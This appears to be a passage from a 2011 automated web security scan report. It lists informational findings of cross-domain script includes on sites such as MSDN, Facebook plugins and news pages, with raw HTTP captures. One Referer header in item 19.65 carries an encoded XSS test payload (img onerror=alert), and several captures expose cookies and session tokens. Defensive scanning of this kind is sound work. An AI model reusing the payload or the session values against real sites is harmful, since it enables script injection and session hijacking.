Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/22/2011 15:41:39&Microsoft.VisitStartDate=07/22/2011 15:39:26&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=109&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 01:54:07 GMT
Content-Length: 88384

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible" con
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

19.53. http://s1.lqcdn.com/m.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s1.lqcdn.com
Path:	/m.min.js

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/{sitename}/{zonename};{searchterm}sz={format};{type}tile={tile};ord={timestamp}?

Request

GET /m.min.js HTTP/1.1
Host: s1.lqcdn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://rawr.codeplex.com/

Response

HTTP/1.0 200 OK
x-amz-id-2: Rs7MtRCXPsUvzpwMJNfhzz9dXHndPtEcAIGQdMdTzTvUOsB6Axsu7JxDhQaXNC3B
x-amz-request-id: 0D4E8C62B4A16097
Date: Fri, 22 Jul 2011 14:09:16 GMT
x-amz-meta-cb-modifiedtime: Fri, 22 Jul 2011 13:53:31 GMT
Last-Modified: Fri, 22 Jul 2011 13:57:35 GMT
ETag: "85e6a162e87458b7a7e3fddc815a77b2"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 17830
Server: AmazonS3
Age: 52667
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 161a1193837bea36c092158a0d5a4e7407be90953eeeab102654590a62be70be33daa6d0b18d6013
Via: 1.0 9593b0ff8992bd3750f08f1e49f206f2.cloudfront.net:11180 (CloudFront), 1.0 cdae7b29e54834fa843334a83ef84c80.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

if(LqmAds===undefined){var LqmAds={GetQueryTerms:function(){var d=[{d:"www.google.",q:"q="},{d:"www.bing.com",q:"q="},{d:"search.live.com",q:"q="},{d:"search.yahoo.com",q:"p="},{d:"codeproject.com",q:
...[SNIP]...
</iframe>';return this.ReplacePlaceholders(b,a)},BuildJavaScriptTag:function(a){var b='<script language="JavaScript" src="http://ad.doubleclick.net/adj/{sitename}/{zonename};{searchterm}sz={format};{type}tile={tile};ord={timestamp}?" type="text/javascript"></script>
...[SNIP]...

19.54. http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-content/plugins/google/css/plusone.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://silverpopweb01.beacontec.com
Path:	/blogs/email-marketing/wp-content/plugins/google/css/plusone.css

Issue detail

The response dynamically includes the following scripts from other domains:

http://apis.google.com/js/plusone.js
http://platform.twitter.com/widgets.js

Request

Response

19.55. http://social.msdn.microsoft.com/Search/en-US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.msdn.microsoft.com
Path:	/Search/en-US

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://code.jquery.com/jquery-1.6.1.min.js
http://i1.social.s-msft.com/Search/GlobalResources/Scripts/omni_rsid_social_min.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/GlobalResources/scripts/common.min.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/scriptloader.js?cver=1864.870%0d%0a

Request

Response

19.56. http://social.msdn.microsoft.com/search/en-US/en-USebb6e previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.msdn.microsoft.com
Path:	/search/en-US/en-USebb6e

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://code.jquery.com/jquery-1.6.1.min.js
http://i1.social.s-msft.com/Search/GlobalResources/Scripts/omni_rsid_social_min.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/GlobalResources/scripts/common.min.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/scriptloader.js?cver=1864.870%0d%0a

Request

Response

19.57. http://sourceforge.net/projects/hoytllc-vcloud/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sourceforge.net
Path:	/projects/hoytllc-vcloud/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.fsdn.com/con/js/min/sf.js?1311259746
http://a.fsdn.com/con/js/sftheme/jquery-1.5.1.js
http://a.fsdn.com/con/js/sftheme/modernizr.custom.90514.js
http://s3.amazonaws.com/ki.js/16994/3eh.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 23 Jul 2011 04:42:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4e2a512591aa916173001760; expires="Tue, 20-Jul-2021 04:42:14 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=018e8d654755b068e6bd689778eb35747982a299gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDhkMmQ2M2RiZTY0Mjk3ODE0NTIzNjFhYWRmOWFhYjIxcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZTJhNTEyNTkxYWE5MTYxNzMwMDE3NjBxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB04qUSbQlfVUOX2NyZWF0aW9uX3RpbWVxDkdB04qUSZFFB3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 24708
Access-Control-Allow-Origin: *

<!doctype html>




<!--[if IE 8 ]>
...[SNIP]...
</script>

<script src="http://a.fsdn.com/con/js/sftheme/modernizr.custom.90514.js"></script>

<script src="http://a.fsdn.com/con/js/sftheme/jquery-1.5.1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#username=sfnet"></script>
...[SNIP]...
</footer>
<script src="http://a.fsdn.com/con/js/min/sf.js?1311259746" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//s3.amazonaws.com/ki.js/16994/3eh.js" async></script>
...[SNIP]...

19.58. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220

Issue detail

The response dynamically includes the following script from another domain:

http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

Request

GET /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; __qca=P0-1342016851-1308225219551; D41U=3ldWxSUW5smmT8Cr1TVsp8odr2wpaUd4kIG9UWzIHns3qOaGxdAxaGw

Response

19.59. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/

Issue detail

The response dynamically includes the following scripts from other domains:

http://code.jquery.com/jquery-1.6.1.min.js
http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Msdn&loc=en-US&resref=&addEnglish=&rn=&rq=&watermark=&focusOnInit=False&beta=0&iroot=vstudio&cver=0001
http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/scripts/common.min.js?cver=0001
http://i1.visualstudiogallery.msdn.s-msft.com/pageresource.js?groupname=visualstudioscripts&v=2011.7.19.3457

Request

Response

19.60. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description

Issue detail

The response dynamically includes the following scripts from other domains:

http://code.jquery.com/jquery-1.6.1.min.js
http://i1.visualstudiogallery.msdn.s-msft.com/content/common/chili/jquery.chili-2.2.min.js
http://i1.visualstudiogallery.msdn.s-msft.com/content/common/chili/recipes.js

Request

Response

19.61. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula

Issue detail

The response dynamically includes the following scripts from other domains:

http://code.jquery.com/jquery-1.6.1.min.js
http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Msdn&loc=en-US&resref=&addEnglish=&rn=&rq=&watermark=&focusOnInit=False&beta=0&iroot=vstudio&cver=0001
http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/scripts/common.min.js?cver=0001
http://i1.visualstudiogallery.msdn.s-msft.com/pageresource.js?groupname=visualstudioscripts&v=2011.7.19.3457

Request

Response

19.62. http://visualstudiogallery.msdn.microsoft.com/site/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/site/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://code.jquery.com/jquery-1.6.1.min.js
http://i1.services.social.s-msft.com/search/Widgets/SearchBox.jss?boxid=SearchTextBox&btnid=SearchButton&brand=Msdn&loc=en-US&resref=&addEnglish=&rn=&rq=&watermark=&focusOnInit=False&beta=0&iroot=vstudio&cver=0001
http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/scripts/common.min.js?cver=0001
http://i1.visualstudiogallery.msdn.s-msft.com/pageresource.js?groupname=visualstudioscripts&v=2011.7.19.3457

Request

Response

19.63. http://widgets.klout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.klout.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js
http://edge.quantserve.com/quant.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:01 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 17909
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bringing Influen
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.64. http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wow.curse.com
Path:	/downloads/wow-addons/details/rawr-official.aspx

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

GET /downloads/wow-addons/details/rawr-official.aspx HTTP/1.1
Host: wow.curse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://rawr.codeplex.com/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
CommunityServer: 4.0.30619.63
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:48:20 GMT
Content-Length: 297089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

19.65. http://www.asp.net/ajax previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.asp.net
Path:	/ajax

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.4.4.min.js

Request

GET /ajax HTTP/1.1
Host: www.asp.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://social.msdn.microsoft.com/search/en-US?query=84e17%3cimg%2520src%253da%2520onerror%253dalert%281%29%3e8704c19d382%3d1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13600
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:46:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AJAX: The Offic
...[SNIP]...
<link href="http://i2.asp.net/umbraco-css/titanoverrides.css?cdn_id=2011-07-12-003" rel="stylesheet" type="text/css" media="screen"/>

<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.4.4.min.js" type="text/javascript"></script>
...[SNIP]...

19.66. http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.betabeat.com
Path:	/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
https://apis.google.com/js/plusone.js

Request

GET /2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/ HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.observer.com/

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 16:13:28 GMT
Server: VoxCAST
Set-Cookie: visitor_page_count=1.5; expires=Thu, 21-Jul-2011 16:08:11 GMT; path=/
X-Powered-By: PHP/5.2.6-1+lenny2
X-Pingback: http://www.betabeat.com/xmlrpc.php
Link: <http://www.betabeat.com/?p=12522>; rel=shortlink
X-Cache: HIT from VoxCAST
Age: 317
Content-Length: 45572
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML>
<html dir="ltr" lang="en-US">
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>

<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

19.67. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boston.com
Path:	/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/13651/slf.js
http://w.sharethis.com/button/sharethis.js

Request

Response

19.68. http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailymarkets.com
Path:	/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:05:40 GMT
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding,Cookie
Last-Modified: Thu, 21 Jul 2011 01:14:52 GMT
ETag: "28a4-4a88a13717b00"
Accept-Ranges: bytes
Content-Length: 50686
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Thu, 21 Jul 2011 19:05:40 GMT
X-Pingback: http://www.dailymarkets.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.4b
Pragma: public
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile
...[SNIP]...
</script><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.69. http://www.datacard.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.datacard.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://dnn506yrbagrg.cloudfront.net/pages/scripts/0010/9062.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: www.datacard.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=US-ASCII
Server: Microsoft-IIS/7.5
X-ATG-Version: UNKNOWN [ DPSLicense/-1 ]
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Date: Thu, 21 Jul 2011 16:03:19 GMT
Connection: close
Content-Length: 60650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...


<script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0010/9062.js"></script>
...[SNIP]...

19.70. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Request

Response

19.71. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Request

Response

19.72. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js

Request

Response

19.73. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js

Request

Response

19.74. http://www.facebook.com/plugins/fan.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/fan.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Request

Response

19.75. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Request

Response

19.76. http://www.hitcon.org/hit2011/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hitcon.org
Path:	/hit2011/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
https://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js

Request

GET /hit2011/ HTTP/1.1
Host: www.hitcon.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Fri, 22 Jul 2011 08:13:54 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 22 Jul 2011 07:16:28 GMT
ETag: "230227-2eda-4a8a33e778b00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 11994
Content-Type: text/html
Age: 3775
X-Cache: HIT from cuisinart.iis.sinica.edu.tw
X-Cache-Lookup: HIT from cuisinart.iis.sinica.edu.tw:80
Via: 1.0 cuisinart.iis.sinica.edu.tw:80 (squid/2.6.STABLE21)
Connection: keep-alive

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="UTF-8">
   <meta property="og:title" content="HITCON 2011 Hacks in Taiwan
...[SNIP]...
<![endif]-->
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#appId=216232338409059&xfbml=1"></script>
...[SNIP]...

19.77. http://www.hitcon.org/hit2011/download.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hitcon.org
Path:	/hit2011/download.html

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js

Request

GET /hit2011/download.html HTTP/1.1
Host: www.hitcon.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.0 200 OK
Date: Fri, 22 Jul 2011 07:51:34 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 22 Jul 2011 07:16:28 GMT
ETag: "230266-22a3-4a8a33e778b00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 8867
Content-Type: text/html
Age: 6344
X-Cache: HIT from cuisinart.iis.sinica.edu.tw
X-Cache-Lookup: HIT from cuisinart.iis.sinica.edu.tw:80
Via: 1.0 cuisinart.iis.sinica.edu.tw:80 (squid/2.6.STABLE21)
Connection: keep-alive

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="UTF-8">
   <meta property="og:title" content="HITCON 2011 Hacks in Taiwan
...[SNIP]...
<![endif]-->
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js"></script>
...[SNIP]...

19.78. http://www.jackhenry.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jackhenry.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: www.jackhenry.com
Proxy-Connection: keep-alive
